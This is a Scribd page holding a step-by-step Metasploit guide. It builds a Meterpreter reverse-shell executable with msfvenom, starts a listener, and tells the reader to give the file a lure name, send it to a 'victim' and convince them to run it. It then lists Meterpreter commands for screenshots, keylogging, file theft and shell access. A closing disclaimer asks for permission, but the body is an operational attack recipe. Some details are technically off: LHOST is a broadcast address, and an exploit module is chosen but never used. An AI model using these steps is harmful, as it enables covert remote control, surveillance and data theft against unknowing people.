KEMBAR78
Metasploit Payload Guide | PDF | System Software | Software
Scribd
Upload
31 views3 pages

Metasploit Payload Guide

This guide provides detailed steps for creating a Metasploit payload and setting up an exploit, including installation, choosing payloads, and starting a listener. It emphasizes the importance of legal and ethical considerations, requiring explicit permission before using these tools. The document also lists various Meterpreter commands for monitoring and controlling the victim's system.

Uploaded by

letsdarkit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
31 views3 pages

Metasploit Payload Guide

This guide provides detailed steps for creating a Metasploit payload and setting up an exploit, including installation, choosing payloads, and starting a listener. It emphasizes the importance of legal and ethical considerations, requiring explicit permission before using these tools. The document also lists various Meterpreter commands for monitoring and controlling the victim's system.

Uploaded by

letsdarkit
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

Metasploit Payload Creation and Exploit Setup (Complete Guide)

1. Install Metasploit Framework

Step 1: Update your system repositories.


sudo apt update

Step 2: Install Metasploit Framework.


sudo apt install metasploit-framework

Step 3: Verify the installation.


msfconsole

2. Start Metasploit Console


msfconsole

3. Choose the Payload and Exploit

Step 1: Choose the exploit to embed the payload in an executable.


use exploit/windows/fileformat/adobe_pdf_embed_exe_nojs

4. Set LHOST and LPORT

Step 1: Set the local IP address (LHOST).


set LHOST 192.168.1.255

Step 2: Set the local port (LPORT) to any available port.


set LPORT 4444

5. Generate the Payload

Step 1: Generate the executable payload using msfvenom.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.255 LPORT=4444 -f exe -
o /path/to/save/payload.exe

- Replace /path/to/save/ with the actual directory where you want to save the
payload.exe file.
- Ensure that the payload is generated with the correct LHOST and LPORT values.

6. Move Payload to Desired Location

Step 1: Once the payload is generated, move it to the location where you want to
save it.
mv payload.exe /desired/location/

You can use any file name for the payload (e.g., 100+darkwebtools.exe).

7. Start the Listener in Metasploit

Step 1: Start a new handler session to listen for the incoming reverse connection.
use exploit/multi/handler
Step 2: Set the payload to windows/meterpreter/reverse_tcp.
set payload windows/meterpreter/reverse_tcp

Step 3: Set LHOST and LPORT to the same values as before.


set LHOST 192.168.1.255
set LPORT 4444

Step 4: Start the listener.


exploit

8. Send the Payload to the Victim

Send the payload.exe file (e.g., 100+darkwebtools.exe) to the victim. Convince them
to run the executable. Once the victim opens it, the reverse connection will be
triggered, and you will get a Meterpreter session in your listener.

9. Monitor the Victim's System via Meterpreter

Step 1: After the victim runs the executable, a session will be created. Check the
active sessions.
sessions

Step 2: Interact with the active session.


sessions -i 1

10. Meterpreter Commands

Once you have access to the victim's system, you can use the following commands for
monitoring and control:

- Get System Info:


sysinfo

- Take Screenshot:
screenshot

- Start Keylogger:
keyscan_start

- Upload Files:
upload /local/file /remote/destination

- Download Files:
download /remote/file /local/destination

- Run System Commands (e.g., open calculator):


execute -f calc.exe

- Access Command Shell:


shell

11. Additional Monitoring Commands

- Check Network Info:


ipconfig
- Access File System:
ls
cd /path/to/target/directory

- Capture Keystrokes (Keylogger):


keyscan_start
keyscan_dump

Important Notes:

1. Always get explicit permission from the owner of the target system before using
these tools. Unauthorized access is illegal and unethical.
2. Educational purposes only – Use this knowledge to secure systems and learn
penetration testing, not for malicious activity.
3. Legal Compliance: Be sure to comply with your local laws and ethical standards
when performing penetration tests.

You might also like